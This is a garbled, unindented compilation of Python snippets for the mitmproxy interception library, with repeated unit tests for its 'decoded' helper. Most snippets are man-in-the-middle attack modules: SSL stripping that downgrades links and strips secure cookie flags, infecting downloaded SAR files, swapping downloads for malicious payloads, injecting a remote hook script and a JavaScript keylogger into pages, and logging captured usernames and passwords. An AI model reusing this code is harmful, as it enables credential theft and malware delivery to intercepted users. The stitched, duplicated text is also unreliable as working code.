def response(flow):
if flow.response.headers.get('Content-Type', '').startswith("text/html"):
with decoded(flow.response):
flow.response.content = flow.response.content.replace(
"</body>",
"<div style=\"font-size:400%;text-align:center;color:red;\">HACKED!!!</div></body>"
)
def test_cannot_encode(self):
r = tresp()
assert r.encode("gzip")
with decoded(r):
r.content = None
assert "content-encoding" not in r.headers
assert r.content is None
def test_cannot_encode(self):
r = tresp()
assert r.encode("gzip")
with decoded(r):
r.content = None
assert "content-encoding" not in r.headers
assert r.content is None
def response(self, flow):
with decoded(flow.response):
if flow.response.content:
c = flow.response.content.replace('</body>', '<style>body '
'{transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg);}'
'</style></body>')
if c > 0:
self.send_output.emit('[{}] {} CSS injected...'.format(self.Name,flow.request.pretty_host))
def test_unknown_ce(self):
r = tresp()
r.headers["content-encoding"] = "zopfli"
r.content = b"foo"
with decoded(r):
assert r.headers["content-encoding"]
assert r.content == b"foo"
assert r.headers["content-encoding"]
assert r.content == b"foo"
def test_unknown_ce(self):
r = tresp()
r.headers["content-encoding"] = "zopfli"
r.content = b"foo"
with decoded(r):
assert r.headers["content-encoding"]
assert r.content == b"foo"
assert r.headers["content-encoding"]
assert r.content == b"foo"
def test_cannot_decode(self):
r = tresp()
assert r.encode("gzip")
r.content = b"foo"
with decoded(r):
assert r.headers["content-encoding"]
assert r.content == b"foo"
assert r.headers["content-encoding"]
assert r.content != b"foo"
r.decode()
assert r.content == b"foo"
def response(context, flow):
from netlib.http import decoded
with decoded(flow.response):
# Remove HSTS headers
flow.request.headers.pop('Strict-Transport-Security', None)
flow.request.headers.pop('Public-Key-Pins', None)
# Check if the file is a SAR file attachment
if "content-disposition" in flow.response.headers:
content_disposition = flow.response.headers.get(
"content-disposition").lower()
if content_disposition.startswith(
"attachment") and content_disposition.endswith(".sar"):
context.log("SAR file attachment found (%s bytes)" %
flow.response.headers["content-length"])
fil = NamedTemporaryFile(delete=False)
fil.write(flow.response.content)
fil.close()
context.log("SAR file temporally stored as '%s'" % fil.name)
infect_sar_file(fil.name, context.inject_files)
context.log("SAR file infected !")
with open(fil.name, "r") as new_fil:
content = new_fil.read()
flow.response.content = content
flow.response.headers["content-length"] = str(len(content))
context.log("Returning infected SAR file (new size %s bytes)" %
flow.response.headers["content-length"])
unlink(fil.name)
context.log("Removed temporally file '%s'" % fil.name)
else:
# Strip links in response body
flow.response.content = flow.response.content.replace(
'https://', 'http://')
# Strip links in 'Location' header
if flow.response.headers.get('Location', '').startswith('https://'):
location = flow.response.headers['Location']
from six.moves import urllib
hostname = urllib.parse.urlparse(location).hostname
if hostname:
context.secure_hosts.add(hostname)
flow.response.headers['Location'] = location.replace(
'https://', 'http://', 1)
# Strip secure flag from 'Set-Cookie' headers
cookies = flow.response.headers.get_all('Set-Cookie')
cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
flow.response.headers.set_all('Set-Cookie', cookies)
def test_modify(self):
r = tresp()
assert "content-encoding" not in r.headers
assert r.encode("gzip")
with decoded(r):
r.content = b"foo"
assert r.content != b"foo"
r.decode()
assert r.content == b"foo"
def test_cannot_decode(self):
r = tresp()
assert r.encode("gzip")
r.content = b"foo"
with decoded(r):
assert r.headers["content-encoding"]
assert r.content == b"foo"
assert r.headers["content-encoding"]
assert r.content != b"foo"
r.decode()
assert r.content == b"foo"
def test_modify(self):
r = tresp()
assert "content-encoding" not in r.headers
assert r.encode("gzip")
with decoded(r):
r.content = b"foo"
assert r.content != b"foo"
r.decode()
assert r.content == b"foo"
def response(self, flow):
if str(flow.response.headers['Content-Type']).startswith('image'):
if path.isfile(self.imagePath):
with decoded(flow.response):
try:
img = StringIO(open(self.imagePath, 'rb').read())
flow.response.content = img.getvalue()
self.send_output.emit(
'[{}] URL:{} image replaced...'.format(
self.Name, flow.request.url))
except:
pass
def response(context, flow):
headers = flow.response.headers
is_text = None
if hasattr(headers, "get_first"):
is_text = headers.get_first('content-type', "").startswith("text")
else:
is_text = len(headers.get_all("content-type")) > 0
if enabled:
if is_text:
with http.decoded(flow.response): # automatically decode gzipped responses.
# flow.response.content = flow.response.content.replace(context.old, context.new)
flow.response.content = re.sub(r'(?i)(</body[^>]*>)', '<script src="http://%s:58080/target/target-script-min.js#anonymous"></script>\\1' % context.ip, flow.response.content)
def test_simple(self):
r = tresp()
assert r.content == b"message"
assert "content-encoding" not in r.headers
assert r.encode("gzip")
assert r.headers["content-encoding"]
assert r.content != b"message"
with decoded(r):
assert "content-encoding" not in r.headers
assert r.content == b"message"
assert r.headers["content-encoding"]
assert r.content != b"message"
def test_simple(self):
r = tresp()
assert r.content == b"message"
assert "content-encoding" not in r.headers
assert r.encode("gzip")
assert r.headers["content-encoding"]
assert r.content != b"message"
with decoded(r):
assert "content-encoding" not in r.headers
assert r.content == b"message"
assert r.headers["content-encoding"]
assert r.content != b"message"
def response(context, flow):
req = flow.request
res = flow.response
url = req.url
with decoded(res):
poor_man_global_var.append({
'url':
url,
'request':
True,
'response':
True,
'response_content':
base64.b64encode(res.content)
})
def response(context, flow):
from netlib.http import decoded
with decoded(flow.response):
# Remove HSTS headers
flow.request.headers.pop('Strict-Transport-Security', None)
flow.request.headers.pop('Public-Key-Pins', None)
# Check if the file is a SAR file attachment
if "content-disposition" in flow.response.headers:
content_disposition = flow.response.headers.get("content-disposition").lower()
if content_disposition.startswith("attachment") and content_disposition.endswith(".sar"):
context.log("SAR file attachment found (%s bytes)" % flow.response.headers["content-length"])
fil = NamedTemporaryFile(delete=False)
fil.write(flow.response.content)
fil.close()
context.log("SAR file temporally stored as '%s'" % fil.name)
infect_sar_file(fil.name, context.inject_files)
context.log("SAR file infected !")
with open(fil.name, "r") as new_fil:
content = new_fil.read()
flow.response.content = content
flow.response.headers["content-length"] = str(len(content))
context.log("Returning infected SAR file (new size %s bytes)" % flow.response.headers["content-length"])
unlink(fil.name)
context.log("Removed temporally file '%s'" % fil.name)
else:
# Strip links in response body
flow.response.content = flow.response.content.replace('https://', 'http://')
# Strip links in 'Location' header
if flow.response.headers.get('Location', '').startswith('https://'):
location = flow.response.headers['Location']
from six.moves import urllib
hostname = urllib.parse.urlparse(location).hostname
if hostname:
context.secure_hosts.add(hostname)
flow.response.headers['Location'] = location.replace('https://', 'http://', 1)
# Strip secure flag from 'Set-Cookie' headers
cookies = flow.response.headers.get_all('Set-Cookie')
cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
flow.response.headers.set_all('Set-Cookie', cookies)
def response(self, flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content, 'lxml')
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
url = '{}'.format(flow.request.pretty_host)
metatag = html.new_tag('script')
metatag.attrs['src'] = self.url
metatag.attrs['type'] = 'text/javascript'
html.body.append(metatag)
flow.response.content = str(html)
self.send_output.emit(
"[{} js script Injected in [ {} ]".format(self.Name, url))
def response(context, flow):
with decoded(flow.response):
flow.request.headers.pop('Strict-Transport-Security', None)
flow.request.headers.pop('Public-Key-Pins', None)
# strip links in response body
flow.response.content = flow.response.content.replace('https://', 'http://')
# strip links in 'Location' header
if flow.response.headers.get('Location', '').startswith('https://'):
location = flow.response.headers['Location']
hostname = urllib.parse.urlparse(location).hostname
if hostname:
context.secure_hosts.add(hostname)
flow.response.headers['Location'] = location.replace('https://', 'http://', 1)
# strip secure flag from 'Set-Cookie' headers
cookies = flow.response.headers.get_all('Set-Cookie')
cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
flow.response.headers.set_all('Set-Cookie', cookies)
def replace(self, pattern, repl, *args, **kwargs):
"""
Replaces a regular expression pattern with repl in both the headers
and the body of the message. Encoded body will be decoded
before replacement, and re-encoded afterwards.
Returns the number of replacements made.
"""
with decoded(self):
self.content, count = utils.safe_subn(
pattern, repl, self.content, *args, **kwargs
)
fields = []
for name, value in self.headers.fields:
name, c = utils.safe_subn(pattern, repl, name, *args, **kwargs)
count += c
value, c = utils.safe_subn(pattern, repl, value, *args, **kwargs)
count += c
fields.append([name, value])
self.headers.fields = fields
return count
def response(self, flow):
if self.isfilePath:
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(
flow.response.content.decode('utf-8', 'ignore'), 'lxml')
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
temp_soup = BeautifulSoup(self.content, 'lxml')
html.body.insert(len(html.body.contents), temp_soup)
flow.response.content = str(html)
return self.send_output.emit(
"[{}] [Request]: {} | injected ".format(
self.Name, flow.request.pretty_host))
else:
return self.send_output.emit(
"[{}] Error Path file not found ".format(self.Name))
def request(self, flow):
self.send_output.emit("FOR: " + flow.request.url + " " +
flow.request.method + " " + flow.request.path +
" " + flow.request.http_version)
with decoded(flow.request):
user_passwd = self.get_password_POST(flow.request.content)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
self.send_output.emit(
"\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name, valur))
self.send_output.emit('HTTP username: %s' % http_user)
self.send_output.emit('HTTP password: %s\n' % http_pass)
except UnicodeDecodeError:
pass
def response(self, flow):
try:
# for another format file types
content = flow.response.headers['Content-Type']
if content in self.payloads:
if path.isfile(self.payloads[content]):
with decoded(flow.response):
self.send_output.emit(
'[downloadspoof]:: URL: {}'.format(
flow.request.url))
self.send_output.emit(
"[downloadspoof]:: Replaced file of mimtype {} with malicious version"
.format(content))
flow.response.content = open(self.payloads[content],
'rb').read()
self.send_output.emit(
'[downloadspoof]:: Patching complete, forwarding to user...'
)
return
self.send_output.emit(
'[downloadspoof]:: {}, Error Path file not found\n'.format(
self.payloads[content]))
except Exception as e:
pass
def response(self, flow):
if self.isfilePath:
with decoded(flow.response):
flow.response.content = flow.response.content.replace("</body>", "<script>" + self.content + "</script></body>")
self.send_output.emit('[{}] javascript keylogger injected..'.format(self.Name))
